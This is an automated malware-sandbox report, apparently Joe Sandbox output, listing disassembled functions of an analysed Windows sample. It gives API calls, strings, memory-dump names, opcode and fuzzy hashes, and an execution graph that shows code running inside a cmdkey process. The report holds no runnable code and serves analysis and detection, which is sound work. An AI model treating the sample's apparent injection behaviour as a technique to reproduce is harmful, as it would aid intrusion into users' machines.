                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(00427CA0,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,?,?,?,?,00000000,?,?), ref: 0040604B
                                • CreateFontIndirectW.GDI32(0040C8C8), ref: 00402037
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcat
                                • String ID:
                                • API String ID: 4253744674-0
                                • Opcode ID: 9f2a315a86747fca2e42ee02dfd95963893f875b0ab85644b2b496c98eb1a616
                                • Instruction ID: a293f1e503c12f3834b95d63be9809c732b55947eac1385e5f26d009a2b4f9be
                                • Opcode Fuzzy Hash: 9f2a315a86747fca2e42ee02dfd95963893f875b0ab85644b2b496c98eb1a616
                                • Instruction Fuzzy Hash: 5401D473144780EFD300BBB49E8AA563BE8EB55706F10893EF685B71E1C9784109CB2D
                                Function 32D3F8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                • API String ID: 3446177414-3610490719
                                • Opcode ID: adc8fc1d56cd73153df1a6cbc6a5365dfe743bf3dbc1561062849a07260be935
                                • Instruction ID: 231132e9ecc46c8a69badd5a50099d2d88a4f4562250be8704e5a423d206998f
                                • Opcode Fuzzy Hash: adc8fc1d56cd73153df1a6cbc6a5365dfe743bf3dbc1561062849a07260be935
                                • Instruction Fuzzy Hash: 5291E175206745AFE31ACF24C884B6EB7A5AF44744F00055AFA849F781DFB4E881CBA2
                                Function 32D60AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • Failed to allocated memory for shimmed module list, xrefs: 32DA9F1C
                                • LdrpCheckModule, xrefs: 32DA9F24
                                • minkernel\ntdll\ldrinit.c, xrefs: 32DA9F2E
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                • API String ID: 3446177414-161242083
                                • Opcode ID: 9a0abba95785c6a090d98583d51cd69183dade92b2325893ada56093e953124f
                                • Instruction ID: c88003eafc1907b88af608e5d41c7f7a71da3ecf6664b7294717c6d358fcf261
                                • Opcode Fuzzy Hash: 9a0abba95785c6a090d98583d51cd69183dade92b2325893ada56093e953124f
                                • Instruction Fuzzy Hash: 0471F575A002099FEB04DF68D991BBEB7F0FB44309F948869E946E7350EB749982CB50
                                Function 0040553B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(004211D0,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF,004211D0,?,?,?,?,?), ref: 004055FA
                                • wsprintfW.USER32 ref: 00405607
                                • SetDlgItemTextW.USER32(?,004211D0), ref: 0040561E
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: ItemTextlstrlenwsprintf
                                • String ID: %u.%u%s%s
                                • API String ID: 3540041739-3551169577
                                • Opcode ID: 1657763a395a501c771c527054f82eb2be7fb15598214c574ca57117f0c03a97
                                • Instruction ID: 55cf9957bdbe08eeb8051450228c2b429c3200e40720c4f5a9b0f695fa8f14cf
                                • Opcode Fuzzy Hash: 1657763a395a501c771c527054f82eb2be7fb15598214c574ca57117f0c03a97
                                • Instruction Fuzzy Hash: 902106737003142FD720A9799C81FAB7289CBC5364F01473EFE6AF71D1E979581885A5
                                Function 00401DBA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,?,?,?), ref: 00401E2C
                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00401E48
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$Timeout
                                • String ID: !
                                • API String ID: 1777923405-2657877971
                                • Opcode ID: 717c05464dbdde1d43877d7e05f7376ad78b7270f4b2221d83dfb1c24934849a
                                • Instruction ID: 49af8de353e46cf11236f791407a5cbcba9ae5af57995df827a2b81b7b260957
                                • Opcode Fuzzy Hash: 717c05464dbdde1d43877d7e05f7376ad78b7270f4b2221d83dfb1c24934849a
                                • Instruction Fuzzy Hash: 44212471209301AFE714AF21C846A2FBBE8EF84755F00093FF585A21E0C6B98D01CA5A
                                Function 004068C1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000B), ref: 004068CF
                                • GetProcAddress.KERNEL32(00000000), ref: 004068EB
                                  • Part of subcall function 00406179: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406190
                                  • Part of subcall function 00406179: wsprintfW.USER32 ref: 004061CC
                                  • Part of subcall function 00406179: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                • API String ID: 2547128583-890815371
                                • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                • Instruction ID: 8df058e233f66e35bffb69da01c296363a0ab298929cdf7fbd230430fe9e2c9f
                                • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                • Instruction Fuzzy Hash: BAD05B371022159BC7012F62AE0895F776DEF56351705443AF541F7270DB38D82295FD
                                Function 32D6EE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c0949f6969620e81bfb2dc172556b9175a7148074cc74a4f480d32e88344c06
                                • Instruction ID: 08b7dfaab3b10a37f118ebcb2041a118e00a826200f0a676fbdd83e5078e146c
                                • Opcode Fuzzy Hash: 1c0949f6969620e81bfb2dc172556b9175a7148074cc74a4f480d32e88344c06
                                • Instruction Fuzzy Hash: 65E1F174D00708CFDB25CFA9C980AADBBF1BF48348F60456AE956AB360DB75A941CF50
                                Function 00405E19 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                • CreateDirectoryW.KERNEL32(00000000,?), ref: 00405E5A
                                • GetLastError.KERNEL32 ref: 00405E64
                                • SetFileSecurityW.ADVAPI32(00000000,80000007,00000001), ref: 00405E7D
                                • GetLastError.KERNEL32 ref: 00405E8B
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                • String ID:
                                • API String ID: 3449924974-0
                                • Opcode ID: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                • Instruction ID: 2395f8a8d7837bad9ab877b1c5b4dd478f8f3e4f7c6de220d66e2a00ae86bb09
                                • Opcode Fuzzy Hash: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                • Instruction Fuzzy Hash: A201EC75D00609DFDB109FA0DA44BAE7BB4EF14315F10453AD989F2190D7789648CF99
                                Function 00403364 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                Download Yara Rule
                                APIs
                                • DestroyWindow.USER32(?,00403554), ref: 00403375
                                • GetTickCount.KERNEL32 ref: 00403394
                                • CreateDialogParamW.USER32(0000006F,00000000,0040362A,00000000), ref: 004033B3
                                • ShowWindow.USER32(00000000,00000005), ref: 004033C1
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                • String ID:
                                • API String ID: 2102729457-0
                                • Opcode ID: 4a7b031ca6bcbd07d04e4791083f97fcd863d0c0ea14b4434ac483fd79bb7cb0
                                • Instruction ID: 05fd0e373085f508408529d976a5f5643121ad856ee530bb797c10a8200a5ccc
                                • Opcode Fuzzy Hash: 4a7b031ca6bcbd07d04e4791083f97fcd863d0c0ea14b4434ac483fd79bb7cb0
                                • Instruction Fuzzy Hash: 2EF0F870651700EBEB209F60EF8DB1A3AA8B740B06F801979F941B51F0DFB89540CA5C
                                Function 32D458E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: b59980ed5c215df13707c66952068a1d59cff52162420ed55177de89fb806bae
                                • Instruction ID: aed25a43ccb600a0304ae61155655856eede5e49c83f0364c49aa8a957d3280a
                                • Opcode Fuzzy Hash: b59980ed5c215df13707c66952068a1d59cff52162420ed55177de89fb806bae
                                • Instruction Fuzzy Hash: 90323474D042699FEB25CF64C984BD9BBB0BF18344F0041EAD549A7781DFB4AA88CF91
                                Function 32D74B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: 0$Flst
                                • API String ID: 0-758220159
                                • Opcode ID: 7f30b0b59e5b6eac79b9dd62657a27c420f881126b317c9cc77e46edf6336018
                                • Instruction ID: 48e9e367d22573c66c7a9c69fed2bcba4f5e730f5b1bf5407ef03f2ec82e65c1
                                • Opcode Fuzzy Hash: 7f30b0b59e5b6eac79b9dd62657a27c420f881126b317c9cc77e46edf6336018
                                • Instruction Fuzzy Hash: 94519BB5A01248CFEB16CF98C49479EFBF4EF44795F14C42AD4869B340EBB49981CBA0
                                Function 32D3DF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: 0$0
                                • API String ID: 3446177414-203156872
                                • Opcode ID: 499b77504d656048a165cf3135edfe449b864fad76e15f124e37f54eb84a7485
                                • Instruction ID: 9ef52a3d71173909b0ae2c7599db72a048b6dff97bc43a4d2bd324894e15ca7a
                                • Opcode Fuzzy Hash: 499b77504d656048a165cf3135edfe449b864fad76e15f124e37f54eb84a7485
                                • Instruction Fuzzy Hash: 03418CB56097459FD301CF28C484A5ABBE4BF88358F144A6EF988DB340D771EA05CF96
                                Function 00406613 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00406AF5: lstrcpynW.KERNEL32(?,?,00000400,0040384C,00428D00,NSIS Error), ref: 00406B02
                                  • Part of subcall function 00406BA0: CharNextW.USER32(?,?,?,00000000,00425A48,0040662A,00425A48,00425A48,00000000,?,?,00406716,?,00000000,76073420,?), ref: 00406BAF
                                  • Part of subcall function 00406BA0: CharNextW.USER32(00000000), ref: 00406BB4
                                  • Part of subcall function 00406BA0: CharNextW.USER32(00000000), ref: 00406BCE
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406D8D
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406DA1
                                  • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406DB9
                                • lstrlenW.KERNEL32(00425A48,00000000,00425A48,00425A48,00000000,?,?,00406716,?,00000000,76073420,?), ref: 00406667
                                • GetFileAttributesW.KERNEL32(00425A48,00425A48), ref: 00406678
                                  • Part of subcall function 004065AA: FindFirstFileW.KERNEL32(00000000,00427648,00000000,00406657,00425A48), ref: 004065B5
                                  • Part of subcall function 004065AA: FindClose.KERNEL32(00000000), ref: 004065C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                • String ID: HZB
                                • API String ID: 1879705256-1498320904
                                • Opcode ID: 2782f30abaae67d32aad9d2ddd7e042e6b9764b6a7ee77395c88dac23f9c836b
                                • Instruction ID: c1f6674fc9072460158ec6ac158274c55d6247b1d16a8c1a13e9c8cd3e3f7c83
                                • Opcode Fuzzy Hash: 2782f30abaae67d32aad9d2ddd7e042e6b9764b6a7ee77395c88dac23f9c836b
                                • Instruction Fuzzy Hash: 60F0C2715016612AC62033762E89A2B255C8E2136979B4F3FFD97F22D2CA3ECC31956D
                                Function 004058AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45windowCOMMON
                                Download Yara Rule
                                APIs
                                • IsWindowVisible.USER32(?), ref: 004058DF
                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405927
                                  • Part of subcall function 004054C3: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Window$CallMessageProcSendVisible
                                • String ID:
                                • API String ID: 3748168415-3916222277
                                • Opcode ID: 2dca9501c208de8155b709c61fb4f4fee366092d07c020c7b33c5c4d6728830a
                                • Instruction ID: b1e338e3564b8c01f07b09259678d1708f9cc3666d75656fad75f4110972ebbf
                                • Opcode Fuzzy Hash: 2dca9501c208de8155b709c61fb4f4fee366092d07c020c7b33c5c4d6728830a
                                • Instruction Fuzzy Hash: 5401D472600619EBDF202F01DC04ADB3A25EB94768F004437F904B62E1C77989A29FED
                                Function 004061EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18windowCOMMON
                                Download Yara Rule
                                APIs
                                • DispatchMessageW.USER32(?), ref: 004061F6
                                • PeekMessageW.USER32(?,00000000,?,T5@,00000001), ref: 0040620A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Message$DispatchPeek
                                • String ID: T5@
                                • API String ID: 1770753511-1075436632
                                • Opcode ID: 9cb97e42a766ea8cada08b0cc05ec87f5fef8c0c6a112fe8ce1f02b30d5e22d0
                                • Instruction ID: 9faa2b1bfb0e31a5f243467a4896c54f1023d1031c98b050ea5e6b6ce42c350d
                                • Opcode Fuzzy Hash: 9cb97e42a766ea8cada08b0cc05ec87f5fef8c0c6a112fe8ce1f02b30d5e22d0
                                • Instruction Fuzzy Hash: 89D0123190020DA7DF109FE0DD09F9A7B6D6B04744F008035B742A9091D679D1179B99
                                Function 00406E83 Relevance: 5.2, APIs: 4, Instructions: 241COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 18d4879820a4453eecdf162b4afe9d44c77a4ab57f81905e4f0cda94476a9892
                                • Instruction ID: 522defa19930b26a7af3553485d7a536a03fd017600a111de47fbc571b524dd9
                                • Opcode Fuzzy Hash: 18d4879820a4453eecdf162b4afe9d44c77a4ab57f81905e4f0cda94476a9892
                                • Instruction Fuzzy Hash: 4B913371A0C3818BE364CF29C480B6BBBE1AFC9344F10892EE5D997390E774A805CB57

                                Execution Graph

                                Execution Coverage:0.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:9
                                Total number of Limit Nodes:1
                                execution_graph 63150 3882a80 LdrInitializeThunk 63152 3882b20 63154 3882b2a 63152->63154 63155 3882b3f LdrInitializeThunk 63154->63155 63156 3882b31 63154->63156 63163 371f0ad 63164 371f0dd 63163->63164 63165 371f257 NtQueryInformationProcess 63164->63165 63166 371f291 63164->63166 63165->63166

                                Executed Functions

                                Function 0371F0AD Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 547nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 371f0ad-371f0db 1 371f0f9-371f119 call 3721398 call 371d0a8 0->1 2 371f0dd-371f0f4 call 3721378 0->2 8 371f6f2-371f6fd 1->8 9 371f11f-371f228 call 371efe8 call 3721398 call 37252a4 call 3710398 call 3720948 call 3710398 call 3720948 call 3723068 1->9 2->1 26 371f6e6-371f6ed call 371efe8 9->26 27 371f22e-371f28c call 3710398 call 3720948 NtQueryInformationProcess call 3721398 9->27 26->8 34 371f291-371f2c8 call 3710398 call 3720948 27->34 39 371f2d9-371f355 call 37252b2 call 3710398 call 3720948 34->39 40 371f2ca-371f2d4 34->40 39->40 49 371f35b-371f36a call 37252dc 39->49 40->26 52 371f3b7-371f3fd call 3710398 call 3720948 call 37239a8 49->52 53 371f36c-371f3b2 call 3722088 49->53 63 371f416-371f50f call 3710398 call 3720948 call 37252ea call 3710398 call 3720948 call 3723388 call 3721348 * 3 call 37252dc 52->63 64 371f3ff-371f411 52->64 53->26 87 371f511-371f540 call 37252dc call 3721348 call 372533e call 37252f8 63->87 88 371f542-371f557 call 37252dc 63->88 64->26 99 371f597-371f5a1 87->99 93 371f580-371f592 call 3721fc8 88->93 94 371f559-371f57b call 3722b38 88->94 93->99 94->93 101 371f663-371f6c6 call 3710398 call 3720948 call 3723cb8 99->101 102 371f5a7-371f5f7 call 3710398 call 3720948 call 3723698 call 37252dc 99->102 101->26 128 371f6c8-371f6e1 call 3721378 101->128 121 371f626-371f62a 102->121 122 371f5f9-371f61f call 3725388 call 372533e 102->122 124 371f636-371f641 121->124 125 371f62c-371f634 call 37252dc 121->125 122->121 124->101 130 371f643-371f65e call 3723fc8 124->130 125->101 125->124 128->26 130->101
                                APIs
                                • NtQueryInformationProcess.NTDLL ref: 0371F276
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763721591.0000000003710000.00000040.00000800.00020000.00000000.sdmp, Offset: 03710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3710000_cmdkey.jbxd
                                Similarity
                                • API ID: InformationProcessQuery
                                • String ID: r,_$0
                                • API String ID: 1778838933-1867104059
                                • Opcode ID: d59769f696c09787be70c6aacb4a55f1e2fd8c7be00940bfea348cea23727dc9
                                • Instruction ID: 05e03cdf1fb3e7961b3a6c0ac9cd163e3dc1d27d8f76c8675b7a117bd8b1a6c5
                                • Opcode Fuzzy Hash: d59769f696c09787be70c6aacb4a55f1e2fd8c7be00940bfea348cea23727dc9
                                • Instruction Fuzzy Hash: A0020C75528B8C8FDBA5EF68C898ADE7BE1FB99304F50061AD84ECB250DF349641CB41
                                Function 038834E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 150 38834e0-38834ec LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: efd1828db048c50be05b2a4266a84ea0e047bb5391dae8a7887270552071f143
                                • Instruction ID: 981587849a48013a5ee7fe43d47bdcd0ba8a20ddf1e5a463744f6ee304735092
                                • Opcode Fuzzy Hash: efd1828db048c50be05b2a4266a84ea0e047bb5391dae8a7887270552071f143
                                • Instruction Fuzzy Hash: 6290023161510902E900A1984614706100587D2201F65C8D6A141D568DC7A5895575B2
                                Function 03882B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 143 3882b80-3882b8c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
